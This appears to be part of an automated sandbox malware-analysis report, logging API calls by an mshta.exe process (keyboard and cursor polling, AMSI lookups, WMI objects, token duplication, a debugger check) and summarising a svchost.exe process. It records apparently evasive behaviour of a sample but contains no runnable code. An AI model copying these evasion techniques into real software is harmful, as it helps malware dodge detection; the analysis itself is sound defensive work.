Module Get Address module_name = c:\windows\system32\user32.dll, function = RegisterTouchHitTestingWindow, address_out = 0x7ffb3c683cc0 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x7ffb3ca39e60 True 1
Fn
System Get Time type = Ticks, time = 114546 True 1
Fn
Window Create wndproc_parameter = 793105331408 True 1
Fn
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40 True 1
Fn
Module Map process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Module Map process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Load module_name = OLEACC.DLL, base_address = 0x7ffb2cef0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x7ffb2cf003c0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Module Load module_name = mshtml.dll, base_address = 0x7ffb223a0000 True 2
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = RegisterDragDrop, address_out = 0x7ffb3cb2e820 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
COM Create interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
Module Load module_name = amsi.dll, base_address = 0x7ffb30c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30c92260 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffb30c926b0 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x7ffb3c9bdd00 True 1
Fn
System Get Time type = Ticks, time = 115656 True 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID True 1
Fn
Module Load module_name = msls31.dll, base_address = 0x7ffb2dcd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 62, address_out = 0x7ffb2dcf9df0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 63, address_out = 0x7ffb2dcfbce0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 66, address_out = 0x7ffb2dcda350 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 61, address_out = 0x7ffb2dcfdc90 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 71, address_out = 0x7ffb2dcf8aa0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 1, address_out = 0x7ffb2dcda580 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 49, address_out = 0x7ffb2dce22c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 52, address_out = 0x7ffb2dce1ec0 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 48, address_out = 0x7ffb2dce2080 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 3, address_out = 0x7ffb2dcdc000 True 1
Fn
Module Load module_name = d2d1.dll, base_address = 0x7ffb355d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\d2d1.dll, function = 1, address_out = 0x7ffb35690a20 True 1
Fn
Module Load module_name = DWrite.dll, base_address = 0x7ffb314d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dwrite.dll, function = DWriteCreateFactory, address_out = 0x7ffb31548d00 True 1
Fn
Module Get Address module_name = c:\windows\system32\dxgi.dll, function = CreateDXGIFactory1, address_out = 0x7ffb37bf6180 True 1
Fn
System Get Time type = Ticks, time = 115828 True 1
Fn
Module Load module_name = d3d11.dll, base_address = 0x7ffb37c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\d3d11.dll, function = D3D11CreateDevice, address_out = 0x7ffb37ca7fa0 True 1
Fn
System Get Time type = Ticks, time = 115921 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\EUDC\1252 False 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 44, address_out = 0x7ffb2dce1c40 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 5, address_out = 0x7ffb2dcdc1d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 513, address_out = 0x7ffb2eae0da0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = ShouldShowIntranetWarningSecband, address_out = 0x7ffb2eaaceb0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Window Set Attribute class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 True 1
Fn
Window Set Attribute class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 True 1
Fn
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x7ffb3c650000 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = IsWindowRedirectedForPrint, address_out = 0x7ffb3c6731d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
COM Get Class ID cls_id = 76A64158-CB41-11D1-8B02-00600806D9B6, prog_id = WbemScripting.SWbemLocator True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffb3c2d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7ffb3c2e8f80 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 117296 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = RevokeDragDrop, address_out = 0x7ffb3cb29710 True 1
Fn
System Get Time type = Ticks, time = 117390 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 117390 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 527, address_out = 0x7ffb2eaae1d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffb30c92490 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 2, address_out = 0x7ffb2dcda8a0 True 1
Fn
COM Create interface = 8F88FD19-5D42-477B-BD45-F6A4A977ED05, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = JS_DEBUG_SCOPE False 1
Fn
Debug Check for Presence c:\windows\system32\mshta.exe True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x7ffb3d310000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy False 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:25 (UTC) True 12
Fn
Module Unmap process_name = c:\windows\system32\mshta.exe True 1
Fn
Module Get Handle module_name = c:\windows\system32\oleaut32.dll, base_address = 0x7ffb3c9b0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 201, address_out = 0x7ffb3c9cb770 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = CoDecrementMTAUsage, address_out = 0x7ffb3cd3b430 True 1
Fn
Module Unmap process_name = c:\windows\system32\mshta.exe True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = OleUninitialize, address_out = 0x7ffb3cb2a4a0 True 1
Fn
System Sleep duration = -1 (infinite) True 2
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 488, address_out = 0x7ffb2eaae150 True 1
Fn
Thread 0xcb8
2 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0xcc0
8 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoInitializeEx, address_out = 0x7ffb3cce3170 True 1
Fn
System Get Time type = Ticks, time = 114234 True 1
Fn
System Get Time type = Ticks, time = 114328 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoWaitForMultipleHandles, address_out = 0x7ffb3cca3ef0 True 1
Fn
System Get Time type = Ticks, time = 115093 True 1
Fn
System Get Time type = Ticks, time = 115656 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoUninitialize, address_out = 0x7ffb3cce2380 True 1
Fn
Thread 0xcbc
1 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Thread 0xcc8
5 0
»
Category Operation Information Success Count Logfile
Module Load module_name = dxgi.dll, base_address = 0x7ffb37bf0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dxgi.dll, function = CreateDXGIFactory, address_out = 0x7ffb37bf5de0 True 1
Fn
System Sleep duration = -1 (infinite) True 3
Fn
Thread 0xcf8
2 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = C:\Windows\System32\jscript9.dll, base_address = 0x7ffb21f00000 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Process #2: svchost.exe
0 0
»
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: RPC Server
Unmonitor End Time: 00:10:05, Reason: Self Terminated
Monitor Duration 00:09:25
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x32c
Parent PID 0x1e4 (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x CAC
0x CB0
0x D28
0x D2C
0x D24
0x D20
0x D1C
0x D18
0x D04
0x D00
0x 1A4
0x 810
0x BD4
0x 9E0
0x 734
0x 890
0x 884
0x 528
0x 2B8
0x 4CC
0x 7F8
0x 7C4
0x 7A4
0x 7A0
0x 79C
0x 798
0x 794
0x 760
0x 790
0x 784
0x 780
0x 750
0x 72C
0x 720
0x 6F4
0x 6D0
0x 6A8
0x 6A4
0x 668
0x 638
0x 628
0x 1E0
0x 618
0x 600
0x 5F8
0x 5D0
0x 5AC
0x 5A0
0x 534
0x 4E0
0x 160
0x 190
0x 280
0x 154
0x 120
0x F8
0x F4
0x 3F4
0x 3F0
0x 3E0
0x 3D0
0x 3C8
0x 3A4
0x 394
